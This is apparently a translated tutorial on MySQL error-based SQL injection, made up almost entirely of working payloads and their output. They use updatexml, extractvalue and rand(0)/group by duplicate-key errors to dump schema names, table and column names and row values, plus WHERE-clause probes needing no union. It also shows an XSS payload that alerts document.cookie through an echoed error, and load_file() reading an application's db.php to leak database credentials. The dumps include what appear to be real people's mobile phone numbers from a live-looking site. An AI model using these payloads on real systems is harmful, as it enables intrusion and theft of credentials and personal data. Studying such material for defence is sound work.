MySQL error-based injection
How does a database error turn into XSS?
When a MySQL statement fails and the application prints the error on the page, the error text leaks information.
=========================================================================================================================================================================
* Error method 1: updatexml. The XPath error message is capped at 32 characters, but no union is needed.
- mysql> select updatexml(1, concat(':', 'test'), 1);
ERROR 1105 (HY000): XPATH syntax error: ':test'
- mysql> select updatexml(1, concat(0x3a, 'test'), 1);
ERROR 1105 (HY000): XPATH syntax error: ':test'
- mysql> select updatexml(1, concat(0x5e, 'test'), 1);
ERROR 1105 (HY000): XPATH syntax error: '^test'
- mysql> select * from f_user where id=1 or 1=updatexml(1,concat(0x5e, 'test'),1);
ERROR 1105 (HY000): XPATH syntax error: '^test'
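Because the XPath error shows only 32 characters, anything longer than that has to be read in windows. The following is an added example, not a query from the original page: it pulls every table name of the current database through updatexml() 31 characters at a time. The 0x7e ('~') marker takes the first of the 32 characters and also guarantees the string is invalid XPath, so the error fires even if the extracted data happened to be valid XPath. Table f_user is the one used on this page; treating "id" as the injectable parameter is an assumption.

```sql
-- Added example (not from the original page): reading a long value through
-- updatexml() in 31-character windows.
-- The XPATH syntax error shows at most 32 characters, and the leading 0x7e
-- ('~') marker, which makes the string invalid XPath, takes one of them.

-- 1. Find out how much there is to read.
select length((select group_concat(table_name)
               from information_schema.tables
               where table_schema = database()));

-- 2. Read it 31 characters at a time: offsets 1, 32, 63, ... (step = 31).
select updatexml(1, concat(0x7e, substr((select group_concat(table_name)
                                         from information_schema.tables
                                         where table_schema = database()), 1, 31)), 1);
select updatexml(1, concat(0x7e, substr((select group_concat(table_name)
                                         from information_schema.tables
                                         where table_schema = database()), 32, 31)), 1);
-- ... continue until the offset exceeds the length from step 1.

-- 3. The same probe inside a WHERE clause (no union needed). f_user is the
--    table used on this page; "id" as the injectable parameter is assumed.
select * from f_user
where id = 1 and updatexml(1, concat(0x7e, substr((select group_concat(table_name)
                                                   from information_schema.tables
                                                   where table_schema = database()), 1, 31)), 1);

-- extractvalue() raises the same XPath error with the same 32-character cap:
select extractvalue(1, concat(0x7e, (select version())));
```

group_concat() is limited by group_concat_max_len (1024 bytes by default), so for a large schema step 1 may under-report; paging the subquery with limit N,1, as the later examples on this page do, avoids that.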
** Replace 'test' above with any subquery or function.
* Error method 2: group by + rand(0) + having. Not capped at 32 characters like the XPath error (the duplicate key value is only cut when the whole error message nears MySQL's error-message buffer), and no union is needed.
- mysql> select * from f_user where id=1 or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0);
ERROR 1062 (23000): Duplicate entry '5.6.21-log~1' for key 'group_key'
* Error method 3: rand + count + group by, normally delivered through a union select; the constant columns (1,2,...) in the examples stand in for the columns of the original select.
rand(0) is seeded, so it produces the same sequence on every machine and on every run.
See the bug reported to the MySQL developer community: http://bugs.mysql.com/bug.php?id=8652
- mysql> select 1,2,count(*),concat('test', char(0x5e), floor(rand(0)*2))x from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry 'test^1' for key 'group_key'
- mysql> select 1,2,count(*),concat('test', char(0x5e), left(rand(0),3))x from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry 'test^0.7' for key 'group_key'
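Why the duplicate-key error is reliable, and the one thing it needs, as an added example that is not part of the original page. Seeded rand(0) always yields the same values, so floor(rand(0)*2) over the first rows is 0, 1, 1, 0, 1, 1, ... GROUP BY fills a temporary table and evaluates the key once to look it up and, when the key is new, a second time to insert it, so on the third row it tries to insert a key that is already there. The two constructed derived tables below show that a source with fewer than three rows never errors.

```sql
-- Added example (not from the original page): why floor(rand(0)*2) forces
-- the duplicate-key error, and the condition it needs.
-- floor(rand(0)*2) over the first rows is 0, 1, 1, 0, 1, 1, ...
-- GROUP BY evaluates the key once for the lookup and again for the insert:
--   row 1: lookup key 0 (absent)  -> insert key 1
--   row 2: lookup key 1 (present) -> counted
--   row 3: lookup key 0 (absent)  -> insert key 1 -> already there -> ERROR 1062
-- So the source table must supply at least three rows.

-- Constructed two-row source: completes without an error.
select count(*), concat('test', 0x5e, floor(rand(0)*2)) x
from (select 1 union all select 2) two_rows
group by x;

-- Constructed three-row source: raises ERROR 1062 Duplicate entry 'test^1'.
select count(*), concat('test', 0x5e, floor(rand(0)*2)) x
from (select 1 union all select 2 union all select 3) three_rows
group by x;

-- information_schema.tables is used on this page because it always has far
-- more than three rows; any table with enough rows works. The sequence
-- itself (unseeded rand() would not be reproducible, and the error would
-- then be hit or miss):
select floor(rand(0)*2) from information_schema.tables limit 6;
```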
** Replace 'test' above with any subquery or function.
Turning the MySQL error into XSS: if the application echoes the raw error into the HTML, the payload carried in the duplicate key is rendered as markup. The payload is passed as a hex literal (0x...) so that no quotes are needed in the injected string.
mysql> select 1,2,count(*),concat((select 0x2F3E3C696D67207372633D226675636B22206F6E6572726F723D616C65727428646F63756D656E742E636F6F6B6965293E), char(0x5e), left(rand(0),3))x from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry '/><img src="fuck" onerror=alert(document.cookie)>^0.7' for key 'group_key'
Dumping the config file password directly, precondition: the FILE privilege (and, on newer servers, a secure_file_priv setting that allows reading that path). The hex literal below is the path of the application's db.php. Note that the XPath error shows only 32 characters, one of which is the ':' marker, so substr windows of 40 starting at 150, 200, 250 leave gaps between windows; stepping the offset by 31 reads the file without gaps.
mysql> select 1,2,3,updatexml(1,concat(char(58),substr(load_file(0x2F616C69646174612F7777772F66616E676A69616E676A756E2F4170706C69636174696F6E2F436F6D6D6F6E2F436F6E662F64622E706870),150,40) ),1);
ERROR 1105 (HY000): XPATH syntax error: ': 'DB_NAME' => 'fan******un','
mysql> select 1,2,3,updatexml(1,concat(char(58),substr(load_file(0x2F616C69646174612F7777772F66616E676A69616E676A756E2F4170706C69636174696F6E2F436F6D6D6F6E2F436F6E662F64622E706870),200,40) ),1);
ERROR 1105 (HY000): XPATH syntax error: ': 'DB_USER' => 's*********b', /'
mysql> select 1,2,3,updatexml(1,concat(char(58),substr(load_file(0x2F616C69646174612F7777772F66616E676A69616E676A756E2F4170706C69636174696F6E2F436F6D6D6F6E2F436F6E662F64622E706870),250,40) ),1);
ERROR 1105 (HY000): XPATH syntax error: ':PWD' => 'hahahaahhah','
Dumping the version
mysql> select 1,2,3,4 union select distinct concat((select version()),floor(rand(0)*2))a, count(*),3,4 from information_schema.tables group by a;
ERROR 1062 (23000): Duplicate entry '5.6.21-log1' for key 'group_key'
Dumping the database name
mysql> select info();
ERROR 1305 (42000): FUNCTION fangjiangjun.info does not exist
(Calling a function that does not exist is enough on its own: MySQL qualifies the name with the current schema, so error 1305 leaks the database name without any group by trick.)
mysql> select count(*), ( concat( (select database()), char(0x5e), floor(rand(0)*2) ) )x from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry 'fangjiangjun^1' for key 'group_key'
Dumping table names
mysql> select concat( (select distinct table_name from information_schema.tables limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry 'CHARACTER_SETS^1' for key 'group_key'
mysql> select concat( (select distinct table_name from information_schema.tables limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry 'COLLATIONS^1' for key 'group_key'
mysql> select concat( (select distinct table_name from information_schema.tables limit 2,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry 'COLLATION_CHARACTER_SET_APPLICABILITY^1' for key 'group_key'
Without a table_schema filter the first rows are information_schema's own tables; restrict the query to the target schema:
mysql> select concat( (select distinct table_name from information_schema.tables where table_schema='fangjiangjun' limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry 'f_admin^1' for key 'group_key'
mysql> select concat( (select distinct table_name from information_schema.tables where table_schema='fangjiangjun' limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry 'f_admin_role^1' for key 'group_key'
Dumping column names
mysql> select concat( (select distinct column_name from information_schema.columns where table_schema='fangjiangjun' and table_name='f_user' limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry 'id^1' for key 'group_key'
mysql> select concat( (select distinct column_name from information_schema.columns where table_schema='fangjiangjun' and table_name='f_user' limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry 'login_time^1' for key 'group_key'
Dumping field values
mysql> select concat( (select mobile_phone from fangjiangjun.f_user order by id limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry '18602029479^1' for key 'group_key'
mysql> select concat( (select mobile_phone from fangjiangjun.f_user order by id limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry '15602267509^1' for key 'group_key'
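The enumeration steps above (version, database, tables, columns, values) are each run here as a stand-alone select. In a real injection the probe usually sits inside a WHERE clause, and the following added example (not from the original page) shows that form: the count/group by query is wrapped in a derived table and used as a boolean term, which makes MySQL materialise it and raise the error, so no union is needed. Schema fangjiangjun and table f_user are the ones used on this page; treating "id" as the injectable parameter is an assumption.

```sql
-- Added example (not from the original page): the page's enumeration steps
-- as probes for a parameter inside a WHERE clause, without union.
-- Wrapping the count/group by query in a derived table (alias "a") and
-- using it as a boolean term is enough for MySQL to materialise it and
-- raise ERROR 1062 with the data in the key. Schema fangjiangjun and table
-- f_user are the page's; "id" as the injectable parameter is assumed.
-- Change "limit 0,1" to "limit 1,1", "limit 2,1", ... to walk the rows;
-- the first probe tells you how many rows there are to walk.

-- how many tables in the current database
select * from f_user where id = 1 and (select 1 from (
  select count(*), concat(
    (select count(*) from information_schema.tables where table_schema = database()),
    0x5e, floor(rand(0)*2)) x
  from information_schema.tables group by x) a);

-- table name at offset 0
select * from f_user where id = 1 and (select 1 from (
  select count(*), concat(
    (select table_name from information_schema.tables
     where table_schema = database() limit 0,1),
    0x5e, floor(rand(0)*2)) x
  from information_schema.tables group by x) a);

-- column name at offset 0 of table f_user
select * from f_user where id = 1 and (select 1 from (
  select count(*), concat(
    (select column_name from information_schema.columns
     where table_schema = database() and table_name = 'f_user' limit 0,1),
    0x5e, floor(rand(0)*2)) x
  from information_schema.tables group by x) a);

-- value at offset 0 of column mobile_phone
select * from f_user where id = 1 and (select 1 from (
  select count(*), concat(
    (select mobile_phone from fangjiangjun.f_user order by id limit 0,1),
    0x5e, floor(rand(0)*2)) x
  from information_schema.tables group by x) a);
```

If the application does not display database errors, none of these messages reach the page and the error-based technique does not apply, even though the injection itself is still there.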